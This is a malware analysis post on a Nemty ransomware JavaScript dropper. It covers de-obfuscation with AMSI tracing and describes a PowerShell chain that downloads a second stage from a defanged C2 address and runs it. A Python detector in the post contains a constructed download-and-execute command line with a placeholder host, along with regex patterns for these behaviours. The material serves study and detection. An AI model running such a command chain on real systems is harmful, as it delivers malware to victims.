- Nemty ransomware was first observed in the wild in August 2019, and its behavior is noted for being similar to GandCrab and Sodinokibi.
- The source code includes an affiliate ID, which suggests it is deployed as a service (rather than being used by a single threat actor for their own campaigns).
- By default, the typical ransom request is $1,000 worth of BTC (approximately 1/10th of a bitcoin at that time).
- The malware is not very sophisticated and includes some oddly redundant features. For example, it is known to perform a language check for several ex-USSR countries, but it still proceeds with execution regardless (Locky, on the other hand, stops if it detects Language ID `0x19`, which is the language ID code for Russian).
- At the time of this writing, Nemty has never been formally attributed to a specific threat actor.
- Historically, it has been delivered via at least one botnet and one or more exploit kits.
- Fortinet has a great technical write-up here.
| Hash Type | File Hash |
|---|---|
| MD5 | ce58fe36343afdbe2b2a36f123ecb9a7 |
| SHA1 | ce17790e9c0d1547f25aa3d30e38b5f17eb9fc8a |
| SHA-256 | f3e743c919c1deaf5108d361c4ff610187606f450fabda0bea3786d4063511b1 |
- The sample for this analysis is a `.js` file which appears to be heavily obfuscated.
- Viewing the full contents of the script in Visual Studio Code, this script is very ugly. We can clean it up with `js-beautify`.
- Viewing the beautified contents, we see two instances of the `eval` command. In JavaScript, the `eval` command "evaluates JavaScript code represented as a string and returns its completion value." (source: Mozilla).
- The presence of the `eval` commands implies that the script will de-obfuscate itself and then execute. Since this is the case, the next step is to emulate it with SpiderMonkey using `js -f malscript.js`.
- Luckily, this turns out to be a very simple script once de-obfuscated.
- We can also run it on a Windows machine using `cscript`, which is the built-in Windows scripting host. If we use this in combination with AMSI, we can actually see the contents of the `.js` file de-obfuscated.
- To do this, we start from an administrative PowerShell console:

```powershell
logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets   # start an ETW trace of AMSI scan events
cscript malscript.js                                                                          # run the script under the Windows Script Host (AMSI sees the de-obfuscated content)
logman stop AMSITrace -ets                                                                    # stop the trace and flush AMSITrace.etl
AMSIScriptContentRetrieval > malscript-output.txt                                             # pull the captured script content out of the trace
```

- Here's a sample of what the output looks like after having used AMSI Script Content Retrieval:
- The malicious `.js` file appears to instantiate two ActiveX objects: a `WScript` shell and a `shell.application`.
- It then executes `cmd.exe` and passes a command to it that executes PowerShell to do the following:
  - Bypass the execution policy
  - Spawn a hidden window
  - Create a new web client object
  - Use the newly created web client object to reach out to `http://92.63.197[.]190/nnn[.]exe` with a very specific user-agent, `Google Chrome`, and save the payload in the `%temp%` directory as `erb19.exe`.
  - Lastly, it executes the newly staged payload.
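The behaviors listed above (execution-policy bypass, hidden window, WebClient download with a spoofed `Google Chrome` user-agent, drop to `%temp%`, then execution) can be turned into a simple process command-line detection. The following is an added example, not code from the original post or from the sample itself; the two command lines, the 192.0.2.10 URL and the `stage2.exe` name are constructed placeholders, and the indicator weights and thresholds are my own assumptions.

```python
import re

# Constructed sample command lines (NOT the real dropper's content). The first
# mimics the chain the post describes; the URL and file name are placeholders.
SUSPECT = (
    'cmd.exe /c powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command '
    '"$c = New-Object System.Net.WebClient; '
    "$c.Headers.Add('User-Agent', 'Google Chrome'); "
    "$c.DownloadFile('http://192.0.2.10/stage2.exe', $env:temp + '\\stage2.exe'); "
    "Start-Process ($env:temp + '\\stage2.exe')\""
)
BENIGN = 'powershell.exe -Command "Get-ChildItem C:\\Logs | Measure-Object"'

# One regex per behaviour listed in the post, weighted by how specific it is
# (weights are an assumption for this example, not a published scoring model).
INDICATORS = {
    "execution_policy_bypass": (re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I), 1),
    "hidden_window": (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), 1),
    "webclient_download": (re.compile(r"net\.webclient|downloadfile|downloadstring", re.I), 2),
    "spoofed_browser_ua": (re.compile(r"user-?agent.{0,12}google chrome", re.I), 2),
    "temp_drop": (re.compile(r"\$env:temp|%temp%", re.I), 1),
    "stage_execution": (re.compile(r"start-process|invoke-item|invoke-expression|\biex\b", re.I), 1),
}


def score_commandline(cmdline: str, parent: str = "") -> dict:
    """Return the matched indicator names, a weighted score and a verdict.

    `parent` is the image name of the process that spawned the command line;
    the post's chain is cscript -> cmd.exe -> powershell, so a Windows Script
    Host parent raises the score on its own.
    """
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(cmdline)]
    score = sum(INDICATORS[h][1] for h in hits)
    if parent.lower() in ("cscript.exe", "wscript.exe"):
        hits.append("script_host_parent")
        score += 2
    # A single indicator (e.g. a hidden window) is common in admin scripts;
    # the combination of download + spoofed UA + %temp% drop is what stands out.
    verdict = "suspicious" if score >= 5 else "review" if score >= 3 else "benign"
    return {"hits": hits, "score": score, "verdict": verdict}


if __name__ == "__main__":
    for label, line, parent in (("suspect", SUSPECT, "cscript.exe"), ("benign", BENIGN, "explorer.exe")):
        print(label, score_commandline(line, parent))
```

Feed it the command-line and parent-image fields from Sysmon Event ID 1 or Windows Security Event 4688 (with command-line auditing enabled) to apply it to real telemetry.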
- This sample is a Nemty ransomware dropper that arrives to the end user as a heavily obfuscated `.js` file.
- After the end user double-clicks it, it will be executed by `cscript` and execute malicious PowerShell via `cmd.exe`.
- The PowerShell creates a new web-client object, assigns a `Google Chrome` user-agent, and downloads the second stage payload from the C2 server.
- Lastly, the new payload gets executed on the victim machine.